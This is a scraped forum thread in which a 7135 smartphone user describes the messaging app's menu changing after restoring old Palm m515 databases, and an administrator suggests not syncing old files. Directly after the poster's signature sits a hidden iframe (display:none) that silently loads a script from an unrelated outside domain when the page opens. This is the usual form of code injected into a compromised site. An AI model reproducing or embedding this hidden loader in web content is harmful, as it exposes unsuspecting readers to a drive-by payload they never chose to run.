+ Reply to Thread
    A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar

Bizzare behavior of Messaging App

Hi fellow 7135 users,
    When I first received my 7135, I programmed it onto Verizon's network, made a call, sent an SMS message, etc. Then, I ran BackupBuddyVFS off my SD card, and restored my databases from my old m515 onto the 7135. Everything worked well, except I noticed a bizzare change in the messaging app.
    I use a Penticon program, Hebrew+ Support, and perhaps this is the cause. But, when I opened up the messaging app before restoring my database, when I would go to send an SMS message, I could choose from a list of recent SMS numbers I'd sent to, but no longer. When I popped down the menu, there were two options: Settings and something else... the other had the About... option.
    Now, after restoring the databases, the messaging app has three options in the menu: settings, blocking and Hebrew. There's no longer an option for About..., so I can't tell what version I'm using.
    I'd done a hard reset to try and fix another messaging problem, and it reverted back to the older messaging app until I restored the databases. Has anyone else experienced this?
    By the way, I'm using SZ 1.0.13, MZ 1.0.27.

Mike<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Administrator
    perhaps you should not have synced the 7135 with your old palm files... did you do a cold boot and install the programs you want to add to the 7135 direct from the site you got them from (in other words without X-ferring files from your old palm to the 7135)?